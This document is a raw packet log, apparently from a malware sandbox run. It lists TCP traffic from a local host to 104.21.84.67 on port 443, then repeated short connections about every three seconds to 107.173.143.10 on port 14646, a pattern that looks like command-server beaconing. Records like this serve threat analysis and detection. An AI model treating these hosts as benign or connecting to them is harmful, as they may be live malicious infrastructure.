                                                                                                                    Dec 13, 2024 07:38:54.624979973 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.625015020 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.632266045 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.632308960 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.632343054 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.632354021 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.632386923 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.632407904 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.640369892 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.640417099 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.640454054 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.640461922 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.640496016 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.640518904 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.647408962 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.647452116 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.647512913 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.647521019 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.647572994 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.783974886 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.784009933 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.784096956 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.784173012 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.784212112 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.784243107 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.791410923 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.791445017 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.791501999 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.791532993 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.791573048 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.791598082 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.798012972 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.798051119 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.798149109 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.798180103 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.798208952 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.798326969 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.806056976 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.806090117 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.806164026 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.806205988 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.806241989 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.806328058 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.812930107 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.812963963 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.813069105 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.813086987 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.813386917 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.820014954 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.820044041 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.820102930 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.820123911 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.820163965 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.820408106 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.827543020 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.827575922 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.827691078 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.827735901 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.827819109 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.834222078 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.834252119 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.834347010 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.834364891 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.835977077 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.976027012 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.976042986 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.976161003 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.976238966 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.976350069 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.983449936 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.983484030 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.983541965 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.983560085 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.983608961 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.983633995 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.990879059 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.990909100 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.990977049 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.990993023 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.991130114 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.997437954 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.997467041 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.997541904 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.997555971 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.997673988 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.999475002 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.999552965 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:54.999579906 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.999607086 CET44349771104.21.84.67192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:54.999671936 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:55.000092983 CET49771443192.168.2.6104.21.84.67
                                                                                                                    Dec 13, 2024 07:38:55.414653063 CET4977814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:38:55.534579039 CET1464649778107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:55.537488937 CET4977814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:38:55.544075966 CET4977814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:38:55.664123058 CET1464649778107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:57.484607935 CET1464649778107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:57.484694958 CET4977814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:38:57.484786987 CET4977814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:38:57.604604006 CET1464649778107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:58.496583939 CET4978814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:38:58.616339922 CET1464649788107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:58.616461039 CET4978814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:38:58.620697021 CET4978814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:38:58.740463972 CET1464649788107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:00.557826042 CET1464649788107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:00.557990074 CET4978814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:00.557990074 CET4978814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:00.677876949 CET1464649788107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:01.574445009 CET4979414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:01.694381952 CET1464649794107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:01.694478989 CET4979414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:01.700632095 CET4979414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:01.820342064 CET1464649794107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:03.634984970 CET1464649794107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:03.635149956 CET4979414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:03.635149956 CET4979414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:03.754936934 CET1464649794107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:04.652729034 CET4980114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:04.772552013 CET1464649801107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:04.772650003 CET4980114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:04.776256084 CET4980114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:04.895942926 CET1464649801107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:06.714364052 CET1464649801107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:06.714457035 CET4980114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:06.714546919 CET4980114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:06.835269928 CET1464649801107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:07.730220079 CET4981014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:07.850687027 CET1464649810107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:07.850801945 CET4981014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:07.854870081 CET4981014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:07.974931955 CET1464649810107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:09.795166016 CET1464649810107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:09.795351028 CET4981014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:09.795351028 CET4981014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:09.915123940 CET1464649810107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:10.808973074 CET4981814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:10.928771019 CET1464649818107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:10.928880930 CET4981814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:10.932670116 CET4981814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:11.052448988 CET1464649818107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:12.870434999 CET1464649818107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:12.870517015 CET4981814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:12.870611906 CET4981814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:12.990348101 CET1464649818107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:13.886713028 CET4982714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:14.006465912 CET1464649827107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:14.006553888 CET4982714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:14.010746956 CET4982714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:14.130490065 CET1464649827107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:15.948955059 CET1464649827107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:15.949037075 CET4982714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:15.949115992 CET4982714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:16.068747044 CET1464649827107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:16.964111090 CET4983614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:17.083890915 CET1464649836107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:17.084003925 CET4983614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:17.087569952 CET4983614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:17.207552910 CET1464649836107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:19.026798010 CET1464649836107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:19.026890993 CET4983614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:19.026983976 CET4983614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:19.146739006 CET1464649836107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:20.042388916 CET4984314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:20.162201881 CET1464649843107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:20.162421942 CET4984314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:20.166038036 CET4984314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:20.285881042 CET1464649843107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:22.129687071 CET1464649843107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:22.129857063 CET4984314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:22.129857063 CET4984314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:22.249795914 CET1464649843107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:23.136830091 CET4985114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:23.256648064 CET1464649851107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:23.257610083 CET4985114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:23.265655041 CET4985114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:23.385412931 CET1464649851107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:25.217544079 CET1464649851107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:25.217756033 CET4985114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:25.217756033 CET4985114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:25.337567091 CET1464649851107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:26.237348080 CET4986014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:26.357115030 CET1464649860107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:26.357254028 CET4986014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:26.362354040 CET4986014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:26.482547045 CET1464649860107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:28.291856050 CET1464649860107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:28.292063951 CET4986014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:28.292064905 CET4986014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:28.411884069 CET1464649860107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:29.308814049 CET4986914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:29.428736925 CET1464649869107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:29.428932905 CET4986914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:29.441555023 CET4986914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:29.561381102 CET1464649869107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:31.369821072 CET1464649869107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:31.369970083 CET4986914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:31.370044947 CET4986914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:31.489695072 CET1464649869107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:32.386199951 CET4987614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:32.506052971 CET1464649876107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:32.506325006 CET4987614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:32.510449886 CET4987614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:32.630279064 CET1464649876107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:34.452327013 CET1464649876107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:34.452550888 CET4987614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:34.452550888 CET4987614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:34.572324038 CET1464649876107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:35.464457989 CET4988514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:35.584275961 CET1464649885107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:35.584379911 CET4988514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:35.589247942 CET4988514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:35.708997965 CET1464649885107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:37.526124954 CET1464649885107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:37.526345968 CET4988514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:37.526441097 CET4988514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:37.646152020 CET1464649885107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:38.542741060 CET4989214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:38.662560940 CET1464649892107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:38.663213015 CET4989214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:38.666423082 CET4989214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:38.786083937 CET1464649892107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:40.604578018 CET1464649892107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:40.604671001 CET4989214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:40.604757071 CET4989214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:40.724499941 CET1464649892107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:41.620876074 CET4990014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:41.740586042 CET1464649900107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:41.740678072 CET4990014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:41.754255056 CET4990014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:41.873991013 CET1464649900107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:43.699372053 CET1464649900107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:43.699446917 CET4990014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:43.708317041 CET4990014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:43.828155994 CET1464649900107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:44.714438915 CET4990914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:44.834501982 CET1464649909107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:44.837526083 CET4990914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:44.841193914 CET4990914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:44.961019993 CET1464649909107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:46.780215979 CET1464649909107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:46.780364990 CET4990914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:46.784538984 CET4990914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:46.904293060 CET1464649909107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:47.792620897 CET4991714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:47.912456036 CET1464649917107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:47.912575006 CET4991714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:47.918087006 CET4991714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:48.037831068 CET1464649917107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:49.855609894 CET1464649917107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:49.855712891 CET4991714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:49.855776072 CET4991714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:49.975569963 CET1464649917107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:50.870537043 CET4992514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:50.990341902 CET1464649925107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:50.990807056 CET4992514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:50.994394064 CET4992514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:51.114152908 CET1464649925107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:52.952748060 CET1464649925107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:52.952850103 CET4992514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:52.952939987 CET4992514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:53.072709084 CET1464649925107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:53.964772940 CET4993414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:54.084728003 CET1464649934107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:54.088624954 CET4993414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:54.091866016 CET4993414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:54.211798906 CET1464649934107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:56.046046019 CET1464649934107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:56.046189070 CET4993414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:56.046253920 CET4993414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:56.166117907 CET1464649934107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:57.391259909 CET4994314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:57.511199951 CET1464649943107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:57.511297941 CET4994314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:57.515124083 CET4994314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:57.635195017 CET1464649943107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:59.468239069 CET1464649943107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:59.468403101 CET4994314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:59.469003916 CET4994314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:39:59.588808060 CET1464649943107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:00.480163097 CET4995114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:00.601501942 CET1464649951107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:00.605540037 CET4995114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:00.608958006 CET4995114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:00.728750944 CET1464649951107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:02.593444109 CET1464649951107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:02.593668938 CET4995114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:02.593668938 CET4995114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:02.713651896 CET1464649951107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:03.606029987 CET4995814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:03.726001024 CET1464649958107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:03.726095915 CET4995814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:03.729861975 CET4995814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:03.849859953 CET1464649958107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:05.692962885 CET1464649958107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:05.693031073 CET4995814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:05.693114996 CET4995814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:05.812788963 CET1464649958107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:06.700016022 CET4996614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:06.819875956 CET1464649966107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:06.819978952 CET4996614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:06.824733019 CET4996614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:06.944509983 CET1464649966107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:08.796561003 CET1464649966107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:08.796633005 CET4996614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:08.796679974 CET4996614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:08.916862011 CET1464649966107.173.143.10192.168.2.6
